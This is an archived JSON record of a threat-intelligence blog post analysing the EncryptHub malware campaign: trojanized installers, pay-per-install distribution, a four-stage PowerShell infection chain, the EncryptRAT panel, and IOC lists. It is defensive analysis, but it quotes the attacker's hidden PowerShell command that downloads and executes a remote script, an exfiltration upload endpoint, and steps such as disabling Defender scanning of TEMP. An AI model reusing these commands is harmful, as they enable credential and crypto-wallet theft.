{
	"id": "f9a46743-1856-4a27-903d-2794b8719ff1",
	"created_at": "2026-04-06T00:16:11.01159Z",
	"updated_at": "2026-04-10T13:12:41.290441Z",
	"deleted_at": null,
	"sha1_hash": "a471cf867c5d619585167646c146c7fd73f312b0",
	"title": "Unveiling EncryptHub: Analysis of a multi-stage malware campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1575075,
	"plain_text": "Unveiling EncryptHub: Analysis of a multi-stage malware\r\ncampaign\r\nBy mpeintner\r\nPublished: 2025-03-06 · Archived: 2026-04-05 21:30:51 UTC\r\nResearch \u0026 Threat Intel Last updated: 10 Nov 2025\r\nWritten By\r\nEncryptHub, a rising cybercriminal entity, has recently caught the attention of multiple threat intelligence teams,\r\nincluding our own (Outpost24’s KrakenLabs). While other reports have begun to shed light on this actor’s\r\noperations, our investigation goes a step further, uncovering previously unseen aspects of their infrastructure,\r\ntooling, and behavioral patterns. \r\nThrough a series of operational security (OPSEC) missteps, EncryptHub inadvertently exposed critical elements\r\nof their ecosystem, allowing us to map their tactics with unprecedented depth. Their lapses include directory\r\nlisting enabled on key infrastructure components, hosting stealer logs alongside malware executables and\r\nPowerShell scripts, and revealing Telegram bot configurations used for data exfiltration and campaign tracking.  \r\nThese mistakes provided us with a unique vantage point into their operations, enabling us to dissect their attack\r\nchain and methodologies in ways that have not yet been publicly detailed. \r\nIn this first part of our report, we will explore EncryptHub’s tactics, infrastructure, and tradecraft, exposing the\r\nextent of their operational footprint. And we’re not stopping there—stay tuned for Part 2, where we’ll reveal even\r\nmore surprises about this threat actor. \r\nEncryptHub: Threat actor executive summary \r\nMulti-stage attack chains: EncryptHub’s campaigns use several layers of PowerShell scripts to gather\r\nsystem data, exfiltrate valuable information, execute evasion techniques, inject malicious payloads (often\r\nembedded in Base64), and deploy further information stealers. \r\nDistribution: EncryptHub has been observed targeting users of popular applications, by distributing\r\ntrojanized versions. Furthermore, the threat actor has also made use of third-party Pay-Per-Install (PPI)\r\ndistribution services. \r\nTarget prioritization: The attacker prioritizes credential logs stolen from victims’ systems based on key\r\nattributes such as cryptocurrency ownership, corporate network affiliation, and the presence of VPN\r\nsoftware. \r\nPreparing for sales: The threat actor is developing a product called “EncryptRAT”—a remote access tool\r\nfeaturing a command-and-control (C2) panel capable of managing infections from different information\r\nstealer and additional modules. There are signs that the threat actor is planning on selling or distributing it\r\nin the near future. \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 1 of 15\n\nVulnerability targeting: EncryptHub seems to be paying close attention to the cybersecurity landscape\r\nand tries to incorporate popular vulnerabilities into their campaigns.  \r\nFigure 1: EncryptHub’s diamond model diagram by Outpost24’s KrakenLabs.\r\nDistribution channels and tactics \r\nEncryptHub has been testing and employing various methods and lures with the aim to deploy malware without\r\ntriggering alerts and raising victims’ suspicions. We begin by examining the more classical approach, how they\r\nused trojanized applications—disguised as legitimate software—to try to gain access to unsuspecting victim’s\r\nsystems and execute malicious operations. \r\nFollowing that, we explore the role of a more novel distribution technique that has been increasing in popularity in\r\nthe last few years: the use of third-party distribution through platforms like LabInstalls. This helps attackers\r\nstreamline the deployment of harmful payloads via automated, pay-per-install services. \r\nTrojanized applications \r\nEncryptHub has been observed spreading counterfeit versions of widely used applications such as QQ Talk, QQ\r\nInstaller, WeChat, DingTalk, VooV Meeting, Google Meet, Microsoft Visual Studio 2022, and Palo Alto\r\nGlobal Protect. By creating fake, trojanized versions of these applications, the threat actor exploits the inherent\r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 2 of 15\n\ntrust users place in these popular tools. These trojanized applications were generated between November 25th\r\n,\r\n2024, and January 1st, 2025. \r\nOnce installed, these trojanized applications serve as a delivery mechanism for subsequent malicious payloads.\r\nThey not only enable initial access but may also provide elevated privileges and persistency, thereby enabling\r\nlateral movement and data exfiltration. \r\nBy imitating genuine application installers, EncryptHub reduces user suspicion and bypasses some automated\r\nsecurity checks. The counterfeit applications appear familiar and trustworthy, essential factors for a successful\r\nmalware distribution campaign. \r\nFigure 2: Screenshot of phishing domain paloaltonworks[.]com that led to the installation of a\r\ntrojanized version of the Palo Alto GlobalProtect application. The image was seen in a Telegram\r\nchannel associated to EncryptHub campaigns.\r\nAll the trojanized applications we analyzed were signed with the following code-signing certificate, which has\r\nalready been revoked: \r\nName HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY \r\nStatus\r\nTrust for this certificate or one of the certificates in the certificate chain has\r\nbeen revoked. \r\nIssuer GlobalSign GCC R45 EV CodeSigning CA 2020 \r\nValid From 01:54 AM 11/25/2024 \r\nValid To 01:54 AM 11/26/2025 \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 3 of 15\n\nValid Usage Code Signing \r\nAlgorithm sha256RSA \r\nThumbprint A0CA753F0845B420E3F25E200B81D9936E731875 \r\nSerial\r\nNumber\r\n1F DB 22 03 07 68 A9 CF 31 F2 A9 6A \r\nThese applications have a PowerShell script embedded that downloads the file worker.ps1. Then, worker.ps1\r\nretrieves system information including external IP address, username, computer name, location (country and city),\r\nOS version, domain name, build type, and administrator status, and the data is sent back to the remote server\r\n(“http://[C2 server]:8080”) via a POST request.  \r\nWe observed the script connected to encrypthub_steal.ps1, which contains strings indicating it is likely a\r\nKematian Stealer sample. It also connected to the PowerShell script message.ps1, which gathers information about\r\nthe system and sends it to the remote server. \r\nOn February 4th, 2025, the threat actor started to use another code-signing certificate: \r\nName Encrypthub LLC \r\nStatus Valid \r\nIssuer Encrypthub LLC  \r\nValid From 2025-02-04 01:41:04 \r\nValid To 2026-02-04 02:01:04 \r\nValid Usage Code Signing \r\nAlgorithm sha256RSA \r\nThumbprint 32AA32BAA3AF74C1710764FCA0E5214ABBEEC455\r\nSerial Number 2E AB A5 BD 3C 3B 4A B1 43 66 E4 09 6C 70 87 B0 \r\nThird-party distribution via LabInstalls \r\nA notable element in EncryptHub’s distribution chain has been the use of a third-party service dubbed\r\n“LabInstalls” since at least January 2nd, 2025. LabInstalls operates as a pay-per-install (PPI) broker for malicious\r\nexecutables (.exe) and PowerShell scripts (.ps1). Their platform is designed to facilitate bulk “installs” for\r\ncybercriminal customers, enabling the rapid dissemination of malware. \r\nThe service employs a fully automated Telegram bot (@labInstalls_bot) that manages customer interactions and\r\ninstallation purchases. \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 4 of 15\n\nFigure 3: Labinstalls’ thread on the XSS underground forum offering for sale the installation\r\nservices via Telegram bot. \r\nEncryptHub indeed confirmed being their client by leaving positive feedback in LabInstalls selling thread on the\r\ntop-tier Russian-speaking underground forum XSS, even including a screenshot that evidences the use of the\r\nservice. The threat actor most likely hired this service to ease the burden of distribution and expand the number of\r\ntargets that his malware could reach. \r\nInstallation services streamline the deployment of malicious installers, automating the process and obscuring the\r\nmalicious origins of the payloads. \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 5 of 15\n\nFigure 4. Encrypthub’s positive feedback as client of the InstallsLab service on the Russian-speaking underground forum XSS. \r\nEncryptHub’s evolving killchain \r\nAll throughout the last few months, Encrypthub has been experimenting, adding tweaks and slowly evolving their\r\nkillchain overtime. In this article, however, we will focus on the latest version we observed at the time of writing,\r\na version they started using around February 13th, 2025.  \r\nThis killchain illustrates EncryptHub’s evolving strategy to deploy information-stealing malware through a multi-stage process. \r\nFigure 5.  EncryptHub’s killchain steps.\r\nInitial execution \r\nThe following command is executed on the victim’s machine: \r\npowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri\r\n‘hxxps://encrypthub[.]us/encrypthub/fickle/payload.ps1’ | Invoke-Expression” \r\nThis command downloads payload.ps1, which is personalized with the attacker’s build ID (in this case,\r\nencrypthub). \r\n1st stage – payload.ps1 \r\nHash: 90b7b711f56f00a1fa08a7a29f2cd8602b8aa1a0d78986dbfc9f64e38ac6cecd \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 6 of 15\n\npayload.ps1 is responsible for stealing sensitive data. Its operation can be summarized as follows: \r\n1. Instance check: The script first verifies whether another instance is already running on the victim’s\r\nmachine. If no instance is detected, it proceeds. \r\n2. Data exfiltration: \r\na. Messaging sessions: Limited to Telegram. \r\nb. Crypto wallets: Targeting both browser-based and desktop wallets. \r\nc. Password manager files: Extracted from browsers and password management extensions. \r\nd. Files: With specific extensions and containing particular keywords. \r\ne. VPN sessions: (For now, only those associated with PaloAltoGP.) \r\n3. System information collection: It gathers basic system details (e.g., Windows version, CPU, GPU) and\r\nattempts to detect any installed antivirus software. \r\n4. Cookie theft: An embedded, base64-encoded executable is decoded and executed to harvest browser\r\ncookies. It is the Go version of Kematian Stealer available on Github. \r\n5. Data storage and exfiltration: All stolen information is saved in a directory within the temporary folder.\r\nOnce data collection is complete: \r\na. The script deletes any empty subdirectories. \r\nb. It compresses the collected data and sends it to: \r\n$($serveruri):8081/upload_file?\r\nfilename=$base64FileName\u0026buildType=$base64BuildType \r\nwhere $serveruri is, in this case encrypthub[.]us. \r\n6. Reporting \r\nThe script tallies the number of stolen cookies, passwords, wallets, and emails, then sends this data along\r\nwith system information to $($serveruri):8081. After reporting, the temporary directory is deleted. \r\n7. Secondary payload execution \r\nFinally, the script downloads and executes another script from: \r\n$($serveruri)/$build/ram/runner.ps1\r\nThis file is saved under a randomly generated name and executed. \r\nStage 2 – runner.ps1 \r\nHash: 1bce694f9f811982eb01d381a69cdd56c3fa81d113e41b5acb902ec66ec942b1 \r\nrunner.ps1 is executed with the following command: \r\npowershell.exe -ArgumentList “-ExecutionPolicy Bypass –\r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 7 of 15\n\nNoProfile -File `”$downloadPath`”” -WindowStyle Hidden \r\n \r\nThis script contains two base64-encoded .msc files. MSC files (Microsoft Common Console Documents) are\r\nXML-based snap-in control files used with the Microsoft Management Console (MMC) for administrative tasks. \r\nThe actions performed by runner.ps1 include: \r\n1. Decoding and storage \r\na. Decodes each MSC file. \r\nb. Saves them in two subfolders created within its current directory. \r\n2. Modification and execution \r\na. Modifies one of the MSC files to embed the URL hxxps://encrypthub[.]us/encrypthub/ram/. \r\nb. Executes the unmodified MSC file, which in turn runs the modified version. \r\nc. The modified file leverages a Shockwave Flash Object from an ActiveX control to open a web browser\r\nand navigate to the specified URL. \r\n3. Cleanup \r\na. Pauses for 30 seconds. \r\nb. Deletes all created folders before exiting. \r\nStage 3 – HTML Loader \r\nWithin the code hosted at hxxps://encrypthub[.]us/encrypthub/ram/, three PowerShell commands are executed,\r\nperforming the following actions: \r\n1. TEMP folder exclusion \r\nInstructs Windows Defender to exclude the TEMP folder from its scans. \r\n2. Secondary script download and execution \r\nDownloads and runs another script from: \r\nhxxps://encrypthub.us/encrypthub/ram/ram.ps1\r\n3. Termination of MMC process \r\nKills the mmc process, which is launched when the MSC scripts are executed. \r\nStage 4 – Rhadamanthys deployment \r\nHash: 411e6413afc5dadc63f69dd37d25f23dfee1fbd5eff1a591ba33dfc38ca5a4fd \r\nram.ps1 is a minimal script comprising only two lines: \r\n1. Download of executable: Downloads hxxps://encrypthub.us/encrypthub/ram/ram.exe (a sample of\r\nRhadamanthys) and saves it to the TEMP folder as transport.exe. \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 8 of 15\n\n2. Execution: Executes transport.exe and waits for its completion. \r\nEncryptRAT panel \r\nAlong with the evolution of the killchain, EncryptHub has also been developing and improving EncryptRAT, a\r\ncommand-and-control (C2) panel, he has been using EncryptHub to manage infections. In the development stage\r\nat the time of writing, this tool allows the user to: \r\nManage active infections. \r\nSend remote commands. \r\nManage additional modules. \r\nMonitor and download logs from infected devices. \r\nConfigure various malware samples \r\nConfigure exfiltration channels \r\nEarly tests suggest that EncryptHub may soon commercialize EncryptRAT, offering it to other threat actors. This\r\nis strongly suggested by the fact that in recent updates the threat actor has added support for multiple users,\r\nlinking those to BuildIDs associated to the different samples, allowing the segregation of both malware and\r\nexfiltrated data.   \r\nFigure 6: Infection results view\r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 9 of 15\n\nFigure 7: Malware configuration panel.\r\nKey takeaways \r\nOur comprehensive analysis of EncryptHub reveals a financially motivated threat actor employing a multi-stage\r\nattack chain—one that leverages both in-house tools and third-party distribution channels. Despite significant\r\nOPSEC oversights, EncryptHub continues to evolve its tactics, underlining the critical need for continuous\r\nmonitoring and proactive defense measures. Organizations must remain vigilant and adopt multi-layered security\r\nstrategies to mitigate the risks posed by such adversaries. \r\nWant to know whether your organization is being discussed on the dark web? Outpost24’s External Attack Surface\r\nManagement (EASM) platform now includes a dark web module that gives users access to threat intelligence\r\npowered by our human-led team, KrakenLabs. Get in touch to learn more or read in part 2 how EncryptHub’s\r\ncybercrime journey started and how he used ChatGPT as an accomplice.\r\nReferences \r\nFor further information, see below a list of references from other cybersecurity companies that reported on\r\nEncryptHub activities: \r\nFortinet. (2024, June 19). Fickle Stealer Distributed via Multiple Attack Chain \r\nSonicWall. (2024, August 5). Beware of Fake WinRar Websites: Malware Hosted on GitHub \r\nProdaft. (2025, Febuary 19). LARVA-208 \r\nTTPs\r\nResource Development \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 10 of 15\n\nStage Capabilities: Drive-by Target (T1608.004) \r\nInitial Access \r\nExploitation of Remote Services (T1210) \r\nExecution \r\nCommand and Scripting Interpreter: PowerShell (T1059.001) \r\nDefense Evasion \r\nObfuscated Files or Information (T1027) \r\nImpair Defenses (T1562.001) \r\nCredential Access \r\nCredentials from Password Stores (T1555.003) \r\nData from Information Repositories (T1213) \r\nDiscovery \r\nSystem Information Discovery (T1082) \r\nCollection \r\n Data from Local System (T1005) \r\nExfiltration \r\nExfiltration Over Web Service (T1567.002) \r\nExfiltration Over Command and Control Channel (T1041) \r\nCommand and Control \r\nApplication Layer Protocol: Web Protocol (T1071.001) \r\nRemote Access Tools (T1219) \r\nIndicators of compromise (IOCs) \r\nDistribution (files code-signed by EncryptHub LLC) \r\n532f4c9c72f1c77531a55f7811371aa65f85fc3a768d792482cab3381cdd29b3 (connect.exe) \r\n4af6e5a266577ccc2dca9fcbe2f56a9673947f6f3b5b9d1d7eb740613fce80d4 (reCAPCHA.exe) \r\n1661e8f8758526f913e4400af8dbfa7587794ba9345f299fa50373c7140e5819 (buzztalk_weaponised.exe) \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 11 of 15\n\nf687fe9966f7a2cb6fdc344d62786958edc4a9d9b8389a0e2fea9907f90cfde2 (google-meets.exe) \r\nDistribution (files code-signed by HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES\r\nCOMPANY) \r\n37bf1269a21cba22af239e734de043f1d08d61b44414bcf63b1b9198e6a8bc87 \r\n7d222bb62ae995479f05d4bddaa0b7d6dd7ade8d9c438214b00cc1d1be9b9db1 \r\ncc70570dd68a01ef43497c13ea7e5620256208b73bd1e4487f3bf0c91617169f \r\nc5f07de4d69742b5a4492f87902c1907948149052a9522719b1f14ab3cb03515 \r\ncbb84155467087c4da2ec411463e4af379582bb742ce7009156756482868859c \r\n725df91a9db2e077203d78b8bef95b8cf093e7d0ee2e7a4f55a30fe200c3bf8f \r\ndb3fe436f4eeb9c20dc206af3dfdff8454460ad80ef4bab03291528e3e0754ad \r\n6b249d6421f4c8c04ca11febb0244f333aa49ca6a28feee62b7c681960a86ad5 \r\n5588d1c5901d61bb09cd2fc86d523e2ccbc35a0565fd63c73b62757ac2ee51f5 \r\n522fd6a56589f3ce764c88846006cca8c37ccbb286c6d2754ea979a59909271d \r\nc124f307ffbfdba7190c0df9651e895c720962094a78a0af347b2f1e7a8962d0 \r\nRelated files \r\n21b99435d0cf1f9845feb795c83cbf9d10211e6bc26460f4cdcfcd57569054fe (worker.ps1)  \r\n381695385bde0f96ad93dcbab79b3fc40f84e497c0b6afd087d2f1a2fbf824c3 (encrypthub_steal.ps1)  \r\n9d9829ff50f5195ef4c1ebee6cf430c013ad47665657ef9a6c3bc0b9911a40c4  \r\n(message.ps1) \r\n1st stage – payload.ps1 \r\n90b7b711f56f00a1fa08a7a29f2cd8602b8aa1a0d78986dbfc9f64e38ac6cecd \r\nEmbedded cookie grabber (Kematian Stealer Go version) \r\nEcb7ee118b68b178e62b68a7e2aaee85bafc8b721cb9cee30d009a0c96e59cef \r\nStage 2 – runner.ps1 \r\n1bce694f9f811982eb01d381a69cdd56c3fa81d113e41b5acb902ec66ec942b1 (runner.ps1) \r\nf2836437090bfb8ff878c9a8aee28e036adc4ad7c73a51623c5c6ff12445a741 (fake WmiMgmt.msc) \r\nStage 3 – HTML Loader \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 12 of 15\n\n07397a113756805501a3f73a027977011849a90053f2a966053711f442d21b8d \r\nStage 4 – Rhadamanthys deployment  \r\n411e6413afc5dadc63f69dd37d25f23dfee1fbd5eff1a591ba33dfc38ca5a4fd (ram.ps1) \r\n06628b0447c94dd270ecaf798bd052891cda386d504a20d439eb994004ff483c (ram.exe) \r\nC2 Rhadamanthys \r\nhxxps://85.234.100[.]177/b97c5970b3a1f0ccc/iwbsn37q.xl2a8 \r\nOther IOCs – seen in January and February 2025 \r\ne4fc16fb36a5cd9e8d7dfe42482e111c7ce91467f6ac100a0e76740b491df2d4 (stealc.exe) \r\n977198c47d5e7f049c468135f5bde776c20dcd40e8a2ed5adb7717c2c44be5b9 (nThread.dll) \r\nfcfb94820cb2abbe80bdb491c98ede8e6cfa294fa8faf9bea09a9b9ceae35bf3 \r\n(CFF Explorer.exe) \r\nDomains \r\nconcur.net[.]co \r\nglobal-protect[.]net  \r\nglobal-protect[.]us \r\nencrypthub[.]us \r\nblackangel[.]dev \r\nmeets-gooie[.]com \r\nfuckedserver[.]net \r\nhealthy-cleanse-fit[.]com \r\nmalwarehunterteam[.]net \r\n353827-coinbase[.]com \r\npaloaltonworks[.]com \r\nconferx[.]live \r\nb8-crypt0x[.]com \r\nalphabit[.]vc \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 13 of 15\n\nIPS \r\n45.131.215[.]16 \r\n64.95.13[.]166 \r\n82.115.223[.]199 \r\n85.209.128[.]128 \r\n82.115.223[.]182 \r\n193.149.176[.]228 \r\nURL related to the use of LabInstalls \r\nhxxp://31.41.244.11/files/5094364719/WClchuE.ps1 \r\nhxxp://31.41.244.11/files/5094364719/wclchue.ps1 \r\nhxxp://31.41.244.11/files/5094364719/T5NHWKA.ps1 \r\nhxxp://31.41.244.11/files/5094364719/RRFd0ev.ps1 \r\nhxxp://31.41.244.11/files/5094364719/wVjWGck.ps1 \r\nhxxp://185.215.113.39/files/5094364719/pcuy9xE.ps1 \r\nhxxp://31.41.244.11/files/5094364719/wvjwgck.ps1 \r\nhxxp://31.41.244.11/files/5094364719/rrfd0ev.ps1 \r\nhxxp://185.215.113.39/files/5094364719/fpEu4ir.ps1 \r\nhxxp://185.215.113.39/files/5094364719/RNsgUnN.ps1 \r\nhxxp://185.215.113.39/files/5094364719/7GVy9sB.ps1 \r\nhxxp://185.215.113.97/files/5094364719/LR8QUOU.ps1\r\nAbout the Author\r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 14 of 15\n\nOutpost24’s Cyber Threat Intelligence team helps businesses stay ahead of malicious actors in the ever-evolving\r\nthreat landscape, helping you keep your assets and brand reputation safe. With a comprehensive threat hunting\r\ninfrastructure, our Threat Intelligence solution covers a broad range of threats on the market to help your business\r\ndetect and deter external threats.\r\nSource: https://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/"
	],
	"report_names": [
		"unveiling-encrypthub-multi-stage-malware"
	],
	"threat_actors": [
		{
			"id": "af10aec6-36a8-4bdb-ba47-8f75b6a4aa4b",
			"created_at": "2025-03-07T02:00:03.797427Z",
			"updated_at": "2026-04-10T02:00:03.821929Z",
			"deleted_at": null,
			"main_name": "Larva-208",
			"aliases": [
				"EncryptHub"
			],
			"source_name": "MISPGALAXY:Larva-208",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434571,
	"ts_updated_at": 1775826761,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a471cf867c5d619585167646c146c7fd73f312b0.pdf",
		"text": "https://archive.orkl.eu/a471cf867c5d619585167646c146c7fd73f312b0.txt",
		"img": "https://archive.orkl.eu/a471cf867c5d619585167646c146c7fd73f312b0.jpg"
	}
}